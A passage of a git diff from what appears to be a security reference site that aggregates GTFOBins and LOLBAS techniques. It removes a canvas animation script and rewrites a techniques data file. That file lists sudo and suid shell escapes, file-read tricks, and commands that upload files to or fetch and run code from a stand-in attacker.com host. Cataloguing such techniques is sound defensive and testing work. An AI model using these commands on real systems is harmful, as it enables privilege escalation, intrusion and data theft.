filaments: ['224,222,244', '156,207,216', '196,167,231'], - gain: 1, - }; - - /** - * Resolve the palette off the canvas itself, so a plate inside a scope - * that pins the night palette draws the dark field even while the page - * around it is on paper. Reading the computed style is what makes that - * work: the cascade has already answered the question, and the canvas - * only has to ask the right element. - * - * Channels come back space-separated from CSS and the 2D context wants - * them comma-separated, hence the normalise. - */ - function readPalette(cv: HTMLCanvasElement): Palette { - const cs = getComputedStyle(cv); - const channels = (name: string, fallback: string) => { - const v = cs.getPropertyValue(name).trim(); - return v ? v.replace(/\s+/g, ',') : fallback; - }; - const blend = cs.getPropertyValue('--fuzz-blend').trim(); - const gain = parseFloat(cs.getPropertyValue('--fuzz-gain')); - return { - blend: (blend || FALLBACK.blend) as GlobalCompositeOperation, - bands: [ - channels('--fuzz-band-1', FALLBACK.bands[0]), - channels('--fuzz-band-2', FALLBACK.bands[1]), - channels('--fuzz-band-3', FALLBACK.bands[2]), - ], - filaments: [ - channels('--fuzz-fil-1', FALLBACK.filaments[0]), - channels('--fuzz-fil-2', FALLBACK.filaments[1]), - channels('--fuzz-fil-3', FALLBACK.filaments[2]), - ], - gain: Number.isFinite(gain) ? gain : FALLBACK.gain, - }; - } - - /** One frame of the field at `phase` ∈ [0,1). Every band's drift and - * breathe is a whole number of cycles per loop, so the 9s loop seams - * cleanly and any two plates on the page stay in step. */ - function frame(cv: HTMLCanvasElement, phase: number, amt: number, pal: Palette): void { - // clientWidth is 0 for the first frames after insert; fall back to the - // host box so the field is not blank until the second layout. - const host = cv.parentElement; - const w = (cv.clientWidth || host?.clientWidth || 0) | 0; - const h = (cv.clientHeight || host?.clientHeight || 0) | 0; - if (!w || !h) return; - - const dpr = Math.min(2, devicePixelRatio || 1); - const bw = Math.round(w * dpr); - const bh = Math.round(h * dpr); - if (cv.width !== bw || cv.height !== bh) { cv.width = bw; cv.height = bh; } - - const ctx = cv.getContext('2d'); - if (!ctx) return; - ctx.setTransform(dpr, 0, 0, dpr, 0, 0); - - const frac = (x: number) => x - Math.floor(x); - const rnd = (s: number) => frac(Math.sin(s * 127.1) * 43758.5453); - - ctx.clearRect(0, 0, w, h); - ctx.globalCompositeOperation = pal.blend; - - for (let bi = 0; bi < BANDS.length; bi++) { - const b = BANDS[bi]; - const cy = b.cy * h; - const ch = b.ch * h; - for (let y = Math.max(0, Math.round(cy - ch)); y < Math.min(h, cy + ch); y += 2) { - const fall = 1 - Math.abs(y - cy) / ch; - const breathe = 0.5 + 0.5 * Math.sin(2 * Math.PI * (b.cyc * phase + y * 0.004 + bi * 0.3)); - const env = fall * (0.4 + 0.6 * breathe); - if (env <= 0.02) continue; - const n = Math.round(env * b.dens * amt); - for (let i = 0; i < n; i++) { - const s = y * 7.3 + i * 13.7 + bi * 101.3; - const x = frac(rnd(s) + phase * b.drift) * (w + 420) - 210; - const len = (18 + rnd(s + 1) * 340) * (0.4 + env); - const hx = 0.22 + 0.78 * Math.pow(Math.sin(Math.PI * ((x / w) * (1 + (bi % 3)) + phase + rnd(bi * 9))), 2); - const a = (0.06 + rnd(s + 2) * 0.34) * env * hx * 1.7 * pal.gain; - ctx.fillStyle = `rgba(${pal.bands[b.hue - 1]},${a.toFixed(3)})`; - ctx.fillRect(x, y, len, rnd(s + 3) > 0.84 ? 2 : 1); - } - } - } - - for (let i = 0; i < 54; i++) { - const s = i * 37.1; - const y = Math.round((rnd(s) * h) / 2) * 2; - const cyc = 1 + (i % 2); - const x = frac(rnd(s + 5) + phase * cyc) * (w + 700) - 350; - const a = (0.1 + rnd(s + 6) * 0.28) * amt * pal.gain; - ctx.fillStyle = `rgba(${pal.filaments[i % 3]},${a.toFixed(3)})`; - ctx.fillRect(x, y, 120 + rnd(s + 7) * 520, 1); - } - - // Scrim by erasure: destination-out bands at top and bottom so type - // near the plate edges always sits on clean ink. The percentage clamp - // matters — a fixed 40px erased most of the short plates. - ctx.globalCompositeOperation = 'destination-out'; - const solid = Math.min(40, h * 0.14); - const ramp = Math.min(26, h * 0.1); - ctx.fillStyle = 'rgba(0,0,0,1)'; - ctx.fillRect(0, 0, w, solid); - ctx.fillRect(0, h - solid, w, solid); - let g = ctx.createLinearGradient(0, solid, 0, solid + ramp); - g.addColorStop(0, 'rgba(0,0,0,1)'); - g.addColorStop(1, 'rgba(0,0,0,0)'); - ctx.fillStyle = g; - ctx.fillRect(0, solid, w, ramp); - g = ctx.createLinearGradient(0, h - solid - ramp, 0, h - solid); - g.addColorStop(0, 'rgba(0,0,0,0)'); - g.addColorStop(1, 'rgba(0,0,0,1)'); - ctx.fillStyle = g; - ctx.fillRect(0, h - solid - ramp, w, ramp); - ctx.globalCompositeOperation = 'source-over'; - } - - /** Density scale. The main site ships at 6; the constant exists for - * tuning, not for the UI. */ - const PRESS = 6; - /** The frame reduced motion keeps as the permanent texture — mid-loop, - * where the bands are at their fullest rather than at a seam. */ - const STILL = 0.3; - - function initFuzz(): void { - const canvases = document.querySelectorAll<HTMLCanvasElement>('[data-fuzz]:not([data-bound])'); - canvases.forEach((cv) => { - cv.dataset.bound = '1'; - const amt = Math.max(0.2, PRESS / 5); - const reduced = matchMedia('(prefers-reduced-motion: reduce)').matches; - - // Resolved once per mode rather than once per frame: getComputedStyle - // flushes style on a canvas repainting at 60fps, and there is nothing - // to re-read between mode changes. - let pal = readPalette(cv); - - // Draw frame zero synchronously. rAF never fires in a hidden tab, - // during print, or in a screenshot, and a schedule-only start leaves - // the canvas at its 300×150 default — a bare plate in every capture. - const still = () => frame(cv, STILL, amt, pal); - frame(cv, reduced ? STILL : (performance.now() / 9000) % 1, amt, pal); - - // The animated loop re-measures every frame, so it absorbs resizes on - // its own; the static frame needs the observer to stay crisp. - const ro = new ResizeObserver(() => { if (reduced) still(); }); - ro.observe(cv.parentElement ?? cv); - - // A bitmap does not inherit. The variables have already changed by - // the time this fires, so re-reading them is all it takes — but a - // still frame has to be redrawn by hand, or the plate keeps the old - // palette until something else resizes it. - const onMode = () => { pal = readPalette(cv); if (reduced) still(); }; - addEventListener('daemonmodechange', onMode); - - let raf = 0; - if (!reduced) { - const loop = (now: number) => { - frame(cv, (now / 9000) % 1, amt, pal); - raf = requestAnimationFrame(loop); - }; - raf = requestAnimationFrame(loop); - } - - document.addEventListener('astro:before-swap', () => { - cancelAnimationFrame(raf); - ro.disconnect(); - removeEventListener('daemonmodechange', onMode); - }, { once: true }); - }); - } - - document.addEventListener('astro:page-load', initFuzz); - if (document.readyState !== 'loading') initFuzz(); - else document.addEventListener('DOMContentLoaded', initFuzz); -</script> diff --git a/src/data/facets.json b/src/data/facets.json @@ -33,7 +33,7 @@ ], "counts": { "techniques": 2885, - "tools": 814, + "tools": 842, "added": 179, "bySource": { "GTFOBins": 2125, @@ -70,8 +70,8 @@ "toolsBySource": { "GTFOBins": 458, "LOLBAS": 244, - "WADComs": 40, - "DAEMON": 72 + "DAEMON": 80, + "WADComs": 60 } }, "commits": { diff --git a/src/data/index-hash.json b/src/data/index-hash.json @@ -0,0 +1,6 @@ +{ + "file": "index-ebbb83bc.json", + "hash": "ebbb83bc", + "bytes": 1310503, + "count": 2885 +} diff --git a/src/data/techniques.json b/src/data/techniques.json @@ -1 +1 @@ -[{"id":"gtfo:7z:file-read:0:sudo","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/7z/"]},{"id":"gtfo:7z:file-read:0:unprivileged","toolId":"gtfo:7z","toolName":"7z","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"7z a -ttar -an -so /path/to/input-file | 7z e -ttar -si -so","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/7z/"]},{"id":"gtfo:R:shell:0:sudo","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:R:shell:0:suid","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:R:shell:0:unprivileged","toolId":"gtfo:R","toolName":"R","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"R --no-save -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/R/"]},{"id":"gtfo:aa-exec:shell:0:sudo","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:aa-exec:shell:0:suid","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:aa-exec:shell:0:unprivileged","toolId":"gtfo:aa-exec","toolName":"aa-exec","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aa-exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aa-exec/"]},{"id":"gtfo:ab:download:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:download:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:download:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"ab -v2 http://attacker.com/path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:sudo","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:suid","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:ab:upload:0:unprivileged","toolId":"gtfo:ab","toolName":"ab","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ab -p /path/to/input-file http://attacker.com/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ab/"]},{"id":"gtfo:acr:command:0:sudo","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:acr:command:0:suid","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:acr:command:0:unprivileged","toolId":"gtfo:acr","toolName":"acr","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo -e 'x:\\n\\t/bin/sh 1>&0 2>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nacr -r ./relative/path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/acr/"]},{"id":"gtfo:agetty:shell:0:suid","toolId":"gtfo:agetty","toolName":"agetty","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"agetty -l /bin/sh -o -p -a root tty","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/agetty/"]},{"id":"gtfo:alpine:file-read:0:sudo","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:alpine:file-read:0:suid","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:alpine:file-read:0:unprivileged","toolId":"gtfo:alpine","toolName":"alpine","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"alpine -F /path/to/input-file","description":"The file is displayed in the terminal interface. Other options might be available, for example, by pressing `S` is possible to save the file content elsewhere.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/alpine/"]},{"id":"gtfo:ansible-playbook:shell:0:sudo","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"]},{"id":"gtfo:ansible-playbook:shell:0:unprivileged","toolId":"gtfo:ansible-playbook","toolName":"ansible-playbook","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >/path/to/temp-file\nansible-playbook /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-playbook/"]},{"id":"gtfo:ansible-test:shell:0:sudo","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ansible-test/"]},{"id":"gtfo:ansible-test:shell:0:unprivileged","toolId":"gtfo:ansible-test","toolName":"ansible-test","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ansible-test shell","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ansible-test/"]},{"id":"gtfo:aoss:shell:0:sudo","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aoss/"]},{"id":"gtfo:aoss:shell:0:unprivileged","toolId":"gtfo:aoss","toolName":"aoss","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"aoss /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aoss/"]},{"id":"gtfo:apache2:file-read:0:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:0:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:0:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -f /path/to/input-file","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:sudo","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:suid","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2:file-read:1:unprivileged","toolId":"gtfo:apache2","toolName":"apache2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'","description":"The first line may be leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2/"]},{"id":"gtfo:apache2ctl:file-read:0:sudo","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"]},{"id":"gtfo:apache2ctl:file-read:0:unprivileged","toolId":"gtfo:apache2ctl","toolName":"apache2ctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"apache2ctl -c 'Include /path/to/input-file'","description":"The first line only is likely leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apache2ctl/"]},{"id":"gtfo:apport-cli:inherit:0:unprivileged","toolId":"gtfo:apport-cli","toolName":"apport-cli","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apport-cli -f\n1\n2\nv","description":"The terminal interface expects some choices in order to spawn tha pager.","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apport-cli/"]},{"id":"gtfo:apt-get:inherit:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:inherit:0:unprivileged","toolId":"gtfo:apt-get","toolName":"apt-get","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"apt-get changelog apt","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:0:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:0:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' >/path/to/temp-file\napt-get -y install -c /path/to/temp-file sl","description":"For this to work the target package (i.e., `sl`) must not be already installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:1:sudo","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:apt-get:shell:1:suid","toolId":"gtfo:apt-get","toolName":"apt-get","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"apt-get update -o APT::Update::Pre-Invoke::=/bin/sh","description":"When the shell exits the `update` command is actually executed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/apt-get/"]},{"id":"gtfo:aptitude:inherit:0:sudo","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aptitude/"]},{"id":"gtfo:aptitude:inherit:0:unprivileged","toolId":"gtfo:aptitude","toolName":"aptitude","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aptitude changelog aptitude","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aptitude/"]},{"id":"gtfo:ar:file-read:0:sudo","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:ar:file-read:0:suid","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:ar:file-read:0:unprivileged","toolId":"gtfo:ar","toolName":"ar","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ar r /path/to/output-file /path/to/input-file\nar p /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ar/"]},{"id":"gtfo:arch-nspawn:shell:0:sudo","toolId":"gtfo:arch-nspawn","toolName":"arch-nspawn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir -p ./etc/\ngrep -oP \"^CHROOT_VERSION='\\K[^']+\" /usr/share/devtools/lib/archroot.sh >.arch-chroot\ntouch ./etc/pacman.conf\necho 'CARCH=true;/bin/sh;exit' >etc/makepkg.conf\narch-nspawn .","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arch-nspawn/"]},{"id":"gtfo:aria2c:command:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\naria2c --on-download-error=/path/to/temp-file http://some-invalid-domain","description":"Note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:command:1:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite 